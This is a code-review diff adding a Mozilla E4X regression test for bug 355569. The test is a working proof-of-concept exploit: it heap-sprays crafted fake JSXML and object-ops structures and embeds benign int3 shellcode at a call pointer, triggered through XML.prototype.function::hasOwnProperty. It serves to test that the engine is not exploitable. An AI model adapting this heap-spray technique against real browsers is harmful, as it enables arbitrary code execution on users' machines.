| Index: mozilla-tests/e4x/Regress/regress-355569.js
|
| ===================================================================
|
| --- mozilla-tests/e4x/Regress/regress-355569.js (revision 0)
|
| +++ mozilla-tests/e4x/Regress/regress-355569.js (revision 0)
|
| @@ -0,0 +1,163 @@
|
| +/* -*- Mode: java; tab-width:8; indent-tabs-mode: nil; c-basic-offset: 4 -*- */
|
| +
|
| +/* ***** BEGIN LICENSE BLOCK *****
|
| + * Version: MPL 1.1/GPL 2.0/LGPL 2.1
|
| + *
|
| + * The contents of this file are subject to the Mozilla Public License Version
|
| + * 1.1 (the "License"); you may not use this file except in compliance with
|
| + * the License. You may obtain a copy of the License at
|
| + * http://www.mozilla.org/MPL/
|
| + *
|
| + * Software distributed under the License is distributed on an "AS IS" basis,
|
| + * WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License
|
| + * for the specific language governing rights and limitations under the
|
| + * License.
|
| + *
|
| + * The Original Code is JavaScript Engine testing utilities.
|
| + *
|
| + * The Initial Developer of the Original Code is
|
| + * Mozilla Foundation.
|
| + * Portions created by the Initial Developer are Copyright (C) 2006
|
| + * the Initial Developer. All Rights Reserved.
|
| + *
|
| + * Contributor(s): shutdown
|
| + *
|
| + * Alternatively, the contents of this file may be used under the terms of
|
| + * either the GNU General Public License Version 2 or later (the "GPL"), or
|
| + * the GNU Lesser General Public License Version 2.1 or later (the "LGPL"),
|
| + * in which case the provisions of the GPL or the LGPL are applicable instead
|
| + * of those above. If you wish to allow use of your version of this file only
|
| + * under the terms of either the GPL or the LGPL, and not to allow others to
|
| + * use your version of this file under the terms of the MPL, indicate your
|
| + * decision by deleting the provisions above and replace them with the notice
|
| + * and other provisions required by the GPL or the LGPL. If you do not delete
|
| + * the provisions above, a recipient may use your version of this file under
|
| + * the terms of any one of the MPL, the GPL or the LGPL.
|
| + *
|
| + * ***** END LICENSE BLOCK ***** */
|
| +gTestfile = 'regress-355569.js';
|
| +
|
| +var bug = 355569;
|
| +var actual = '';
|
| +var expect = '';
|
| +
|
| +START('XML.prototype.hasOwnProperty foo');
|
| +printBugNumber (bug);
|
| +printStatus (summary);
|
| +
|
| +var targetAddress = 0x12030010;
|
| +var sprayParams = {
|
| + chunkSize: 16 * 1024 * 1024,
|
| + chunkCount: 16,
|
| + chunkMarker: 0xdeadface,
|
| + chunkAlign: 0x1000,
|
| + reservedSize: 1024
|
| +};
|
| +
|
| +function makeExploitCode() {
|
| + /* mov eax, 0xdeadfeed; mov ebx, eax; mov ecx, eax; mov edx, eax; int3 */
|
| + return "\uEDB8\uADFE\u89DE\u89C3\u89C1\uCCC2";
|
| +}
|
| +
|
| +/*==========================================================================*/
|
| +/*==========================================================================*/
|
| +
|
| +function packData(template, A) {
|
| + var n = 0, result = "", vl;
|
| + for(var i = 0; i < template.length; i++) {
|
| + var ch = template.charAt(i);
|
| + if(ch == "s" || ch == "S") {
|
| + vl = A[n++] >>> 0; result += String.fromCharCode(vl & 0xffff);
|
| + } else if(ch == "l" || ch == "L") { // XXX endian
|
| + vl = A[n++] >>> 0; result += String.fromCharCode(vl & 0xffff, vl >> 16);
|
| + } else if(ch == "=") {
|
| + result += String(A[n++]);
|
| + }
|
| + }
|
| + return result;
|
| +}
|
| +function buildStructure(worker, address) {
|
| + var offs = {}, result = "", context = {
|
| + append: function(k, v) { offs[k] = result.length * 2; result += v; },
|
| + address: function(k) { return address + ((k && offs[k]) || 0); }
|
| + }; worker(context); result = ""; worker(context); return result;
|
| +}
|
| +function repeatToLength(s, L) {
|
| + if(L <= s.length) { return s.substring(0, L); }
|
| + while(s.length <= L/2) { s += s; }
|
| + return s + s.substring(0, L - s.length);
|
| +}
|
| +function sprayData(data, params, rooter) {
|
| + var marker = packData("L", [ params.chunkMarker ]);
|
| + data += repeatToLength("\u9090", params.chunkAlign / 2 - data.length);
|
| + data = repeatToLength(data, (params.chunkSize - params.reservedSize) / 2);
|
| + for(var i = 0; i < params.chunkCount; i++) {
|
| + rooter[i] = marker + data + i;
|
| + }
|
| +}
|
| +
|
| +function T_JSObject(map, slots)
|
| +{ return packData("LL", arguments); }
|
| +function T_JSObjectMap(nrefs, ops, nslots, freeslot)
|
| +{ return packData("LLLL", arguments); }
|
| +function T_JSObjectOps(
|
| + newObjectMap, destroyObjectMap, lookupProperty, defineProperty,
|
| + getProperty, setProperty, getAttributes, setAttributes,
|
| + deleteProperty, defaultValue, enumerate, checkAccess,
|
| + thisObject, dropProperty, call, construct,
|
| + xdrObject, hasInstance, setProto, setParent,
|
| + mark, clear, getRequiredSlot, setRequiredSlot
|
| +) { return packData("LLLLLLLL LLLLLLLL LLLLLLLL", arguments); }
|
| +
|
| +function T_JSXML_LIST(
|
| + object, domnode, parent, name, xml_class, xml_flags,
|
| + kids_length, kids_capacity, kids_vector, kids_cursors,
|
| + xml_target, xml_targetprop
|
| +) { return packData("LLLLSS LLLL LL", arguments); }
|
| +function T_JSXML_ELEMENT(
|
| + object, domnode, parent, name, xml_class, xml_flags,
|
| + kids_length, kids_capacity, kids_vector, kids_cursors,
|
| + nses_length, nses_capacity, nses_vector, nses_cursors,
|
| + atrs_length, atrs_capacity, atrs_vector, atrs_cursors
|
| +) { return packData("LLLLSS LLLL LLLL LLLL", arguments); }
|
| +
|
| +/*==========================================================================*/
|
| +/*==========================================================================*/
|
| +
|
| +function makeExploitData(address) {
|
| + return buildStructure(function(ctx) {
|
| + ctx.append("xml-list",
|
| + T_JSXML_LIST(0, 0, 0, 0, 0, 0, 1, 0, ctx.address("xml-kids-vector"), 0, 0, 0));
|
| + ctx.append("xml-kids-vector",
|
| + packData("L", [ ctx.address("xml-element") ]));
|
| + ctx.append("xml-element",
|
| + T_JSXML_ELEMENT(ctx.address("object"), 0, 0, 0, 1, 0, 0, 0, 0, 0, /*c*/ 0, 0, 0, 0, /*d*/ 0, 0, 0, 0));
|
| + ctx.append("object",
|
| + T_JSObject(ctx.address("object-map"), 0));
|
| + ctx.append("object-map",
|
| + T_JSObjectMap(0, ctx.address("object-ops"), 0, 0));
|
| + ctx.append("object-ops",
|
| + T_JSObjectOps(0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, ctx.address("exploit-code"), 0));
|
| + ctx.append("exploit-code",
|
| + makeExploitCode(ctx));
|
| + }, address);
|
| +}
|
| +
|
| +function exploit() {
|
| + sprayData(makeExploitData(targetAddress), sprayParams, this.rooter = {});
|
| + var numobj = new Number(targetAddress >> 1);
|
| + XML.prototype.function::hasOwnProperty.call(numobj);
|
| + printStatus("probably not exploitable");
|
| +}
|
| +
|
| +try
|
| +{
|
| + exploit();
|
| +}
|
| +catch(ex)
|
| +{
|
| +}
|
| +
|
| +TEST(1, expect, actual);
|
| +
|
| +END();
|
|
|
Chromium Code Reviews
Issue 2865028:
Update the mozilla tests to new version (as of 2010-06-29). (Closed)
Base URL: svn://chrome-svn/chrome/trunk/deps/third_party/